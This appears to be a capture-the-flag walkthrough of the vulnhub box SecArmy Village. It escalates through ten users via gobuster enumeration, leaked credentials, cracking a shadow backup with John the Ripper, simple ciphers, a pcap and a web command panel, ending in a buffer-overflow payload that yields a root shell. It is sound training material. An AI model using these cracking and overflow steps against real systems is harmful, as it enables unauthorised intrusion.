This is a box created for Secarmy 2020 ctf during GrayHat containing 10 challenges inside it covering different topics from pentesting to crypto and pwn. This machine can be found on vulnhub
Enumeration
Running nmap we find 4 ports open :
1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~# nmap -p- -T5 192.168.1.41
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 17:41 CET
Nmap scan report for 192.168.1.41
Host is up (0.000093s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
1337/tcp open waste
MAC Address: 08:00:27:6C:A7:B6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds
UNO
Going to port 80 we find the following landing page
Then running gobuster we find a hidden directory, /anon:
1
2
3
4
root@kali:~# gobuster dir -u http://192.168.1.41/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/javascript (Status: 301)
/anon (Status: 301)
/server-status (Status: 403)
Inspecting it source code we find user uno credentials
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<head>
<title>Totally Secret Directory</title>
</head>
<body>
<center><b style="font-size: 32px;">Welcome to the hidden directory! <br>
<br>
Here are your credentials to make your way into the machine!
<br>
<br>
<font color="white">uno:luc10r4m0n</font>
</b></center>
</body>
</html>
After accessing through ssh we find a file containing the credentials for user dos
1
2
3
4
uno@svos:~$ cat readme.txt
Head over to the second user!
You surely can guess the username , the password will be:
4b3l4rd0fru705
DOS
Now that we have switched to dos we find a readme
1
2
3
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
So we can just read all the files and use grep to look for that string and show also a few lines above and below it
1
dos@svos:~/files$ cat * | grep -B 10 -A 10 a8211ac1853a1235d48829414626512a
From it we get
1
Look inside file3131.txt
Going to that file we find an string which seems to be base64 encoded
1
2
3
4
5
6
7
8
9
10
11
12
UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA
Then going to cyberchef we see it was a zip file and we can get the files contained inside it
From todo.txt we get the following
1
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
TRES
When connecting to port 1337 we are asked for a token, so we can use the one obtained from the previous file
1
2
3
4
root@kali:~# nc 192.168.1.40 1337
Welcome to SVOS Password Recovery Facility!
Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
And we obtain user tres credentials
1
Here's your login credentials for the third user tres:r4f43l71n4j3r0
CUATRO
We find a txt file inside tres home’s directory which tells to reverse a linux binary
1
2
tres@svos:~$ cat readme.txt
A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user's credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU
Trying to run the binary we obtain an error
1
2
tres@svos:~$ ./secarmy-village
./secarmy-village: error while loading shared libraries: libgo.so.16: cannot open shared object file: No such file or directory
So we can use strings to read some data from it and among its ouput we can retrieve cuatro user pass
1
2
tres@svos:~$ string secarmy-village
p3dr00l1v4r3z
CINCO
In cuatro directory we find a file telling about checking /justanothergallery
1
2
cuatro@svos:~$ cat todo.txt
We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.
Going to the website we find the following landing page
Then using gobuster we find /qr directory containing all qr codes
1
2
root@kali:~# gobuster dir -u http://192.168.1.41/justanothergallery/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/qr (Status: 301)
So we can do a bulk download of these qr codes by using wget :
1
2
3
4
5
6
7
8
9
10
root@kali:~#wget -r --no-parent http://192.168.1.41/justanothergallery/qr/
root@kali:~/192.168.1.41/justanothergallery/qr# ls
image-0.png image-17.png image-24.png image-31.png image-39.png image-46.png image-53.png image-60.png image-68.png 'index.html?C=M;O=A'
image-10.png image-18.png image-25.png image-32.png image-3.png image-47.png image-54.png image-61.png image-6.png 'index.html?C=M;O=D'
image-11.png image-19.png image-26.png image-33.png image-40.png image-48.png image-55.png image-62.png image-7.png 'index.html?C=N;O=A'
image-12.png image-1.png image-27.png image-34.png image-41.png image-49.png image-56.png image-63.png image-8.png 'index.html?C=N;O=D'
image-13.png image-20.png image-28.png image-35.png image-42.png image-4.png image-57.png image-64.png image-9.png 'index.html?C=S;O=A'
image-14.png image-21.png image-29.png image-36.png image-43.png image-50.png image-58.png image-65.png index.html 'index.html?C=S;O=D'
image-15.png image-22.png image-2.png image-37.png image-44.png image-51.png image-59.png image-66.png 'index.html?C=D;O=A'
image-16.png image-23.png image-30.png image-38.png image-45.png image-52.png image-5.png image-67.png 'index.html?C=D;O=D'
Then, we can just read the qr codes using zbar and a simple bash script for automating things
1
2
3
4
5
6
#!/bin/bash
for i in $(ls -la | grep png)
do
zbarimg -q $i 2>/dev/null
done
From the output we can get user cinco credentials
1
2
3
4
5
6
7
8
QR-Code:the
QR-Code:credentials
QR-Code:for
QR-Code:solving
QR-Code:the
QR-Code:5th
QR-Code:user:
QR-Code:cinco:ruy70m35
SEIS
As usual we find another hint, this time telling to look for other directory
1
2
cinco@svos:~$ cat readme.txt
Check for Cinco's secret place somewhere outside the house
So in the root directory we find a directory called cinco-secrets
1
2
3
4
5
6
cinco@svos:/cincos-secrets$ ls -la
total 16
dr-xr-xr-x 2 cinco root 4096 Oct 9 18:07 .
drwxr-xr-x 25 root root 4096 Oct 18 14:42 ..
-rw-r--r-- 1 cinco root 31 Oct 9 18:07 hint.txt
--w------- 1 cinco root 1876 Sep 27 15:46 shadow.bak
There we have a backup of the shadow file and a hint which makes reference to rockyou wordlist:
1
2
cinco@svos:/cincos-secrets$ cat hint.txt
we will, we will, ROCKYOU..!!!
Now it can be easily cracked using John the Ripper, obtaining Hogwarts as the password.
1
2
3
4
5
6
7
root@kali:~# john shadow --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Hogwarts (seis)
SIETE
In this case we are asked to visit /shellcmsdashboard
1
2
seis@svos:~$ cat readme.txt
head over to /shellcmsdashboard webpage and find the credentials!
Going to the website we find this login page
We can easily find the credentials in a comment of the robots.txt file
1
# Username: admin Password: qwerty
After loggin in we are asked to visit /aabbzzee.php
There we can execute commands as www-data. Running ls-la we find an interesting file readme9213.txt without reading permissions.
But as it is owned by www-data we can give it permissions and read it obtaining next user password.
OCHO
Now inside seven’s home we find a bunch of files and a zip file which is password protected
1
2
siete@svos:~$ ls
flag7.txt hint.txt key.txt message.txt mighthelp.go password.zip
The contents of the txt files are the following :
1
2
3
4
5
6
7
siete@svos:~$ cat hint.txt
Base 10 and Base 256 result in Base 256!
siete@svos:~$ cat key.txt
x
siete@svos:~$ cat message.txt
[11 29 27 25 10 21 1 0 23 10 17 12 13 8]
So it is a crypto challenge were we have a set of a numbers and an ascii key and we are looking for an ascii output, so it seems like XOR.
Going to https://www.dcode.fr/xor-cipher we insert the numbers for being decoded and ‘x’ as the decryption key and obtain the password of the zip file.
From the zip file we obtain user ocho credentials
1
2
3
4
5
6
siete@svos:~$ unzip password.zip
Archive: password.zip
[password.zip] password.txt password:
extracting: password.txt
siete@svos:~$ cat password.txt
the next user's password is m0d3570v1ll454n4
NUEVE
Now we find a packet capture file
1
2
ocho@svos:~$ ls
flag8.txt keyboard.pcapng
We will transfer it to our machine for analyzing it with wireshark using scp
1
scp ocho@192.168.1.35:/home/ocho/keyboard.pcapng keyboard.pcapng
Following http stream from get /none.txt we get a bunch of text but in the middle of it we can find an encrypted message
Taking into account the context of the challenge it seems like a keyboard shift cipher, so we can go to https://www.dcode.fr/keyboard-shift-cipher for decoding it
There we obtain user nueve credentials
ROOT
This is the final challenge where we need to root the machine , inside nueve’s home we find a binary file and a funny readme :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
nueve@svos:~$ ls
flag9.txt orangutan readme.txt
nueve@svos:~$ cat readme.txt
,╓╓╖╗╗╗╗╖╖╓,
,╓╗╬╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓@╗,
╓@▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫@╖
,╗▓╫╫╫▓▀▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╬╣╫╫╫╫@,
,#╫╫╫▓▓░░░░╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫Ñ░░░╣▓╫╫╫▌µ
,╗▓╫╫╫╫▓▀░░░░░░╩╫╫Ñ╫╫╫╫╫╫╫╫░╫╫Ñ░░░░░░╠▓▓╫╫╫╫@µ
╓╬╫╫╫╫╫╫▓▌░░░░░╩"`` ╙╫╫╫╫M ``"╨╦░░░░╠▓▓╫╫╫╫╫▓╗
╓╣╫╫╫╫╫╫╫▓▓░░░░╩ ,╦NÑÑNÑ░╫╫Ñ░NÑÑN╦╥ ╙░░░░╟▓▓╫╫╫╫╫╫╫W
,╬╫╫╫╫╫╫╫╫▓▓▌░░░╨ ╦░░░▄▓▓▄░░░░╠▓▓▓▄░░Ñ 1░░░░▓▓╫╫╫╫╫╫╫╫▓µ
╔╫╫╫╫╫╫╫╫╫╫▓▓▒░░░░╦N░░░╙████░░░░║███▌░░░╦╦N░░░░▓▓╫╫╫╫╫╫╫╫╫╫@
╬╫╫╫╫╫╫╫╫╫╫╫▓▓M░░░░░░░░░░░╠╠░░░░░░╙╠░░░░░░░░░░░░╣▓▓╫╫╫╫╫╫╫╫╫╫▓
╬╫╫╫╫╫╫╫╫╫╫╫╫▀░░░░░░░░░░░░░░░░╬╫╬╫░░░░░░░░░░░░░░░░╠▓╫╫╫╫╫╫╫╫╫╫╫╫,
╬╫╫╫╫╫╫╫╫╫╫╫▓Ñ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╣╫╫╫╫╫╫╫╫╫╫╫╫
╟╫╫╫╫╫╫╫╫╫╫╫▓M░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓╫╫╫╫╫╫╫╫╫╫▓
╔╫╫╫╫╫╫╫╫╫╫╫▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓╫╫╫╫╫╫╫╫╫╫▌
╫╫╫╫╫╫╫╫╫╫╫▓▓▌░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫U
╟╫╫╫╫╫╫╫╫╫╫╫▓▓▓░░░░░░░░░╠▄▄░░░░░░░░░░░░░░░░░░░▄▄░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫▓
╫╫╫╫╫╫╫╫╫╫╫╣▓▓▓@░░░░░░░░╠███▓▄▄▄░░░░░░░░╠▄▄▄▓██▀░░░░░░░░╠▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫U
╟╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓░░░░░░░░░░╠▀▀████████████▀▀▀░░░░░░░░░░╟▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫▓
▓╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░µ╬▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫U
J╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓╬µ░░░░░░░░░░░░░░░░░░░░░░░░µ▄╬▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫@
╟╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓@╬▄▄µ░░░░░░░░µµ▄▄╬▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
╣╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌ ╙╫╫╫╫╫╫╫╫M╣╬▀░░░╣▓▓▓▓▓▓▓Ñ░░╠▓M╣▓╫╫╫╫╫╫╫▀ ╙╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ ╫╫╫▓╩╠╣M░░░░░░░░╫╫╫╫╫╫Ñ░░░░░░░░╣╠╠╢╫╫╫H J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡
]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ ╔░░╠░░░░░░░░░░░░░╢╫╫╫╫╫░░░░░░░░░░░░░Ö░░N J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌
╞╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ 1░░░░░░░░░░░░░░░░░╫╫╫╫▌░░░░░░░░░░░░░░░░Ñ J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓
╟╫╫╫╫╫▓╣╣╣╣╣╫╫╫╫╫╡ 1░░░░░░░░░░░░░░░░╣╫╫╫░░░░░░░░░░░░░░░░Ñ J╫╫╫╫╫▓▓╣╣╣▓╫╫╫╫╫╫
╚╣░░░░░░░░░░░░░╠╠╡ 1░░░░░░░░░░░░░░░╟╫╫╫░░░░░░░░░░░░░░░Ñ J╬░░░░░░░░░░░░░░╠╬
1░░░░░░░░░░░░░░░░H 1░░░░░░░░░░░░░░╫M▀╬░░░░░░░░░░░░░░H ░░░░░░░░░░░░░░░░░
╙╨ª "╨╨``╨╨" ╚╨ª 1░░░░░░░░░░░░Ñ 1░░░░░░░░░░░░H "╨╨``╨╨" ╚╨ª ª╨╨`
╙░░░░░░░░░╨` `ªÑ░░░░░░░░H
Can u feeeeeed my orangutan ^^
I executed the file and as it said it was a pwn file I sent a lot of ‘A’ to verify it was vulnerable to Buffer Overflow
1
2
3
4
5
nueve@svos:~$ ./orangutan
hello pwner
pwnme if u can ;)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
Then I decided to decompile the code using ghidra
From the C code we can see that the buffer length is 24 and then if the value of local_10 variable matches 0xcafebabe it spawns a root shell.
As the machine has installed python3 I went to my machine and created a simple script using python2 for generating the buffer that needs to be passed to the program:
1
2
3
4
from struct import *
res='A'*24
res+=pack('I',int('0xcafebabe',16))//Transforms to little endian
print (res)
Then I piped the output to a .txt file and uploaded to the machine through scp.
Finally we pipe the buffer to the program and execute another cat to read from stdin and feed it to the /bin/sh executed by the program. Obtaining a root shell.
1
2
3
4
5
6
7
nueve@svos:~$ (cat bof.txt;cat) | ./orangutan
hello pwner
pwnme if u can ;)
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),1009(nueve)